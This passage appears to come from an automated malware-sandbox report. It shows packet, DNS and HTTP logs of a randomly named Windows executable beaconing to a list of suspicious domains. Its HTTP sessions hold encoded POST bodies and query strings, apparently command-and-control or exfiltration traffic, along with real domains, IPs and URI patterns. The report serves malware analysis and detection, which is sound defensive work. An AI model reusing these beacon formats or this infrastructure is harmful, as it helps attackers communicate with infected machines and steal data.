                                                              Nov 12, 2024 15:32:25.963128090 CET8049999167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:25.963139057 CET8049999167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:26.682861090 CET8049999167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:26.693248987 CET8049999167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:26.693361044 CET4999980192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:27.460856915 CET4999980192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:28.483803034 CET5000080192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:28.488801003 CET8050000167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:28.491854906 CET5000080192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:28.499835014 CET5000080192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:28.504714012 CET8050000167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:29.160559893 CET8050000167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:29.198745966 CET8050000167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:29.198863983 CET5000080192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:29.199793100 CET5000080192.168.2.7167.172.133.32
                                                              Nov 12, 2024 15:32:29.204673052 CET8050000167.172.133.32192.168.2.7
                                                              Nov 12, 2024 15:32:34.770159006 CET5000280192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:34.775031090 CET8050002162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:34.775875092 CET5000280192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:34.787796974 CET5000280192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:34.792795897 CET8050002162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:35.459532022 CET8050002162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:35.497536898 CET8050002162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:35.497596979 CET5000280192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:36.289836884 CET5000280192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:37.308507919 CET5000380192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:37.313410044 CET8050003162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:37.313477039 CET5000380192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:37.327239990 CET5000380192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:37.332405090 CET8050003162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:37.989630938 CET8050003162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:38.028031111 CET8050003162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:38.029978037 CET5000380192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:38.835958958 CET5000380192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:39.855061054 CET5000480192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:39.860394955 CET8050004162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:39.860511065 CET5000480192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:39.873861074 CET5000480192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:39.878854990 CET8050004162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:39.878866911 CET8050004162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:40.572204113 CET8050004162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:40.610308886 CET8050004162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:40.610986948 CET5000480192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:41.384952068 CET5000480192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:42.401446104 CET5000580192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:42.406476021 CET8050005162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:42.406596899 CET5000580192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:42.413814068 CET5000580192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:42.418759108 CET8050005162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:43.097803116 CET8050005162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:43.135812998 CET8050005162.0.211.143192.168.2.7
                                                              Nov 12, 2024 15:32:43.135958910 CET5000580192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:43.136820078 CET5000580192.168.2.7162.0.211.143
                                                              Nov 12, 2024 15:32:43.141724110 CET8050005162.0.211.143192.168.2.7

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 12, 2024 15:30:51.060600996 CET6489853192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:30:51.083847046 CET53648981.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:30:56.104475021 CET6330553192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:30:56.306859016 CET53633051.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:31:12.448606014 CET6197253192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:31:12.477277040 CET53619721.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:31:26.167290926 CET6135053192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:31:26.239876986 CET53613501.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:31:39.886172056 CET6492053192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:31:40.245990992 CET53649201.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:31:53.589075089 CET6447453192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:31:53.602463961 CET53644741.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:32:06.951756954 CET5550953192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:32:06.978616953 CET53555091.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:32:20.824088097 CET5654453192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:32:20.835546970 CET53565441.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:32:34.215806007 CET5946153192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:32:34.766196012 CET53594611.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:32:48.153987885 CET5571853192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:32:48.215430975 CET53557181.1.1.1192.168.2.7
                                                              Nov 12, 2024 15:32:53.681330919 CET5596453192.168.2.71.1.1.1
                                                              Nov 12, 2024 15:32:53.743803978 CET53559641.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 12, 2024 15:30:51.060600996 CET192.168.2.71.1.1.10xd889Standard query (0)www.tangible.onlineA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:30:56.104475021 CET192.168.2.71.1.1.10xa786Standard query (0)www.tesetturhanzade.xyzA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:12.448606014 CET192.168.2.71.1.1.10xe910Standard query (0)www.kantinestoel.onlineA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:26.167290926 CET192.168.2.71.1.1.10xe043Standard query (0)www.deeplungatlas.orgA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:39.886172056 CET192.168.2.71.1.1.10xe8e3Standard query (0)www.ultrawin23.shopA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:53.589075089 CET192.168.2.71.1.1.10x5e49Standard query (0)www.sonoscan.orgA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:06.951756954 CET192.168.2.71.1.1.10x4ef2Standard query (0)www.zz67x.topA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:20.824088097 CET192.168.2.71.1.1.10x1cc6Standard query (0)www.omnibizlux.bizA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:34.215806007 CET192.168.2.71.1.1.10x1522Standard query (0)www.vibixx.siteA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:48.153987885 CET192.168.2.71.1.1.10xaf85Standard query (0)www.rka6460.onlineA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:53.681330919 CET192.168.2.71.1.1.10xb23cStandard query (0)www.rka6460.onlineA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 12, 2024 15:30:51.083847046 CET1.1.1.1192.168.2.70xd889Name error (3)www.tangible.onlinenonenoneA (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:30:56.306859016 CET1.1.1.1192.168.2.70xa786No error (0)www.tesetturhanzade.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 12, 2024 15:30:56.306859016 CET1.1.1.1192.168.2.70xa786No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 12, 2024 15:30:56.306859016 CET1.1.1.1192.168.2.70xa786No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:12.477277040 CET1.1.1.1192.168.2.70xe910No error (0)www.kantinestoel.onlinekantinestoel.onlineCNAME (Canonical name)IN (0x0001)false
                                                              Nov 12, 2024 15:31:12.477277040 CET1.1.1.1192.168.2.70xe910No error (0)kantinestoel.online91.184.0.200A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:26.239876986 CET1.1.1.1192.168.2.70xe043No error (0)www.deeplungatlas.org194.9.94.85A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:26.239876986 CET1.1.1.1192.168.2.70xe043No error (0)www.deeplungatlas.org194.9.94.86A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:40.245990992 CET1.1.1.1192.168.2.70xe8e3No error (0)www.ultrawin23.shopultrawin23.shopCNAME (Canonical name)IN (0x0001)false
                                                              Nov 12, 2024 15:31:40.245990992 CET1.1.1.1192.168.2.70xe8e3No error (0)ultrawin23.shop170.39.213.43A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:53.602463961 CET1.1.1.1192.168.2.70x5e49No error (0)www.sonoscan.org13.248.169.48A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:31:53.602463961 CET1.1.1.1192.168.2.70x5e49No error (0)www.sonoscan.org76.223.54.146A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:06.978616953 CET1.1.1.1192.168.2.70x4ef2No error (0)www.zz67x.topzz67x.topCNAME (Canonical name)IN (0x0001)false
                                                              Nov 12, 2024 15:32:06.978616953 CET1.1.1.1192.168.2.70x4ef2No error (0)zz67x.top38.47.232.194A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:20.835546970 CET1.1.1.1192.168.2.70x1cc6No error (0)www.omnibizlux.biz167.172.133.32A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:34.766196012 CET1.1.1.1192.168.2.70x1522No error (0)www.vibixx.site162.0.211.143A (IP address)IN (0x0001)false
                                                              Nov 12, 2024 15:32:48.215430975 CET1.1.1.1192.168.2.70xaf85No error (0)www.rka6460.onlinerka6460.onlineCNAME (Canonical name)IN (0x0001)false
                                                              Nov 12, 2024 15:32:53.743803978 CET1.1.1.1192.168.2.70xb23cNo error (0)www.rka6460.onlinerka6460.onlineCNAME (Canonical name)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.tesetturhanzade.xyz
                                                              • www.kantinestoel.online
                                                              • www.deeplungatlas.org
                                                              • www.ultrawin23.shop
                                                              • www.sonoscan.org
                                                              • www.zz67x.top
                                                              • www.omnibizlux.biz
                                                              • www.vibixx.site

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.74996585.159.66.93801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:30:56.327024937 CET347OUTGET /ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.tesetturhanzade.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:30:57.211643934 CET225INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.14.1
                                                              Date: Tue, 12 Nov 2024 14:30:57 GMT
                                                              Content-Length: 0
                                                              Connection: close
                                                              X-Rate-Limit-Limit: 5s
                                                              X-Rate-Limit-Remaining: 19
                                                              X-Rate-Limit-Reset: 2024-11-12T14:31:02.0765892Z


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.74997791.184.0.200801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:12.495757103 CET628OUTPOST /ggvc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.kantinestoel.online
                                                              Origin: http://www.kantinestoel.online
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.kantinestoel.online/ggvc/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 30 35 64 78 5a 57 4d 55 57 6f 69 30 42 72 35 77 46 79 6d 37 69 77 51 58 45 42 6a 45 66 79 74 74 50 4e 68 4f 46 56 45 65 78 54 4e 48 36 35 56 65 78 51 3d 3d
                                                              Data Ascii: ZtwlQ=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq05dxZWMUWoi0Br5wFym7iwQXEBjEfyttPNhOFVEexTNH65VexQ==
                                                              Nov 12, 2024 15:31:13.333739042 CET500INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:31:13 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.74997891.184.0.200801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:15.042330027 CET648OUTPOST /ggvc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.kantinestoel.online
                                                              Origin: http://www.kantinestoel.online
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.kantinestoel.online/ggvc/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 74 53 33 69 30 6f 4f 32 74 33 55 41 55 48 63 34 63 35 47 66 70 67 65 65 46 45 7a 63 56 4d 69 56 37 76 49 71 76 6e 50 58 69 49 37 38 59 64 41 5a 64 4f 4c 74 31 43 56 61 56 59 58 4a 31 55 53 77 45 56 55 75 6e 4d 57 73 68 35 36 76 5a 63 6f 4a 64 64 56 68 45 42 44 4e 77 62 76 38 47 53 38 59 52 70 66 53 65 49 72 45 59 79 79 51 43 49 6f 47 73 68 4e 6a 62 43 4c 57 57 6c 6f 2b 42 48 41 48 52 66 4d 43 6e 76 54 67 6b 54 77 77 38 6d 54 4f 4a 2b 36 6c 78 6f 4e 6b 61 6c 4e 56 51 72 6d 4f 4a 39 34 53 66 51 71 58 38 68 6f 73 41 44 48 79 49 55 77 59 4e 4d 6c 57 49 33 77 2f 75 6b 6f 74 33 72 30 61 6e 72 32 2f 48 4d 31 57 51 39 76 7a 73 7a 7a 68 2b 5a 63 55 68 71 45 3d
                                                              Data Ascii: ZtwlQ=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVMiV7vIqvnPXiI78YdAZdOLt1CVaVYXJ1USwEVUunMWsh56vZcoJddVhEBDNwbv8GS8YRpfSeIrEYyyQCIoGshNjbCLWWlo+BHAHRfMCnvTgkTww8mTOJ+6lxoNkalNVQrmOJ94SfQqX8hosADHyIUwYNMlWI3w/ukot3r0anr2/HM1WQ9vzszzh+ZcUhqE=
                                                              Nov 12, 2024 15:31:15.853849888 CET500INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:31:15 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.74997991.184.0.200801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:17.633007050 CET1661OUTPOST /ggvc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.kantinestoel.online
                                                              Origin: http://www.kantinestoel.online
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.kantinestoel.online/ggvc/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 74 53 33 69 30 6f 4f 32 74 33 55 41 55 48 63 34 63 35 47 66 70 67 65 65 46 45 7a 63 56 4d 36 56 36 61 55 71 31 41 62 58 6a 49 37 38 62 64 41 63 64 4f 4b 33 31 42 6c 65 56 59 72 33 31 52 65 77 46 32 63 75 68 35 32 73 72 35 36 76 62 63 6f 49 41 4e 56 4f 45 42 54 4a 77 61 44 38 47 53 38 59 52 76 37 53 4f 4b 54 45 4c 69 79 50 53 59 6f 77 39 78 4d 45 62 42 36 72 57 6c 73 45 42 32 67 48 57 2f 63 43 6c 5a 50 67 76 54 77 79 37 6d 54 57 4a 2b 33 6c 78 73 74 2f 61 6d 51 64 51 70 6d 4f 59 72 55 4d 47 45 2b 74 6c 77 38 52 4a 67 37 78 47 58 59 65 49 50 35 73 58 77 63 49 73 32 6c 55 33 4e 38 6b 6a 72 37 76 57 76 5a 64 4a 76 6e 37 6c 48 4b 58 6b 61 49 43 6a 38 36 51 67 67 42 37 31 6f 71 68 73 51 38 39 42 74 73 54 67 77 4d 6f 30 74 41 4d 6c 58 66 4c 42 33 6e 77 6d 6d 51 38 6b 38 52 64 73 43 74 4c 70 35 7a 6a 52 33 4b 38 65 67 47 41 73 54 59 31 74 6c 49 6e 31 61 45 62 43 55 78 34 69 4c 32 76 63 6c 31 4b 61 30 57 4d 36 54 4e 69 50 50 5a 6b 47 34 5a 72 46 48 6c 54 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=xLMHm78liR0KtS3i0oO2t3UAUHc4c5GfpgeeFEzcVM6V6aUq1AbXjI78bdAcdOK31BleVYr31RewF2cuh52sr56vbcoIANVOEBTJwaD8GS8YRv7SOKTELiyPSYow9xMEbB6rWlsEB2gHW/cClZPgvTwy7mTWJ+3lxst/amQdQpmOYrUMGE+tlw8RJg7xGXYeIP5sXwcIs2lU3N8kjr7vWvZdJvn7lHKXkaICj86QggB71oqhsQ89BtsTgwMo0tAMlXfLB3nwmmQ8k8RdsCtLp5zjR3K8egGAsTY1tlIn1aEbCUx4iL2vcl1Ka0WM6TNiPPZkG4ZrFHlTOwP+MNFfxK8n6LOycH00jDowGSIU81/Rtus1dyyd3bs7546E8HUD/spAFXXVLjj5zMGvndRsMuCtP23g1u7u9XX+HYaU65Gg55Ofi5VjG7zqQ7gAcnq+LGzpAR753MZZVe5OqRC/f1EC43yHIYBl1oJgf+wc7HqRSwYoAM8nzu8V+VbBOFsuG4IOOHc+vs3fxYn4hSHQfqdA2IMBJw4+z18t0ZvDCTE2nPsgr2aywyKP+H77Cy8iCB++H1vSBdsAV+S+Fy8H6lWIkaq/5nxUkXMl65GKXjuYwzuaSGeB9CEKZB69bJZd2aRdz38aFMzy9wwOEyOYJ1nTetLmyIswAipadzhy0t20UkHgFLxOGt5GfOl5FFScUYdZ6V5QX4sAPGVPpEEUCOF9eC6EKg7eEEUBRyCAFb+DX/s0H8BtiZXWdK0avHt1GqWZUxJKMb2tMdhs5tmWGQbJIsGcAokRovZ0uDMUFau6juzP8x2wn0OzgcDoxQEFxE5iJeRmrXSn7WKTXJ3NaEHByXIkxTHcMWAbQXAlImCLstVC58RaLC1/mHIN2zhF+Xh8axvUw+8Qez9+kc//43whCH+c7D2a5UuCI/Vi4a4YFQ7T7FHLGzCWzIAHyz0D6d7lNhS2dl17J2msULn/0lZvKOZMfXU2klgyxE1xBhJVts [TRUNCATED]
                                                              Nov 12, 2024 15:31:18.436959028 CET500INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:31:18 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.74998091.184.0.200801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:20.179465055 CET347OUTGET /ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE9 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.kantinestoel.online
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:21.021104097 CET500INHTTP/1.1 404 Not Found
                                                              Date: Tue, 12 Nov 2024 14:31:20 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


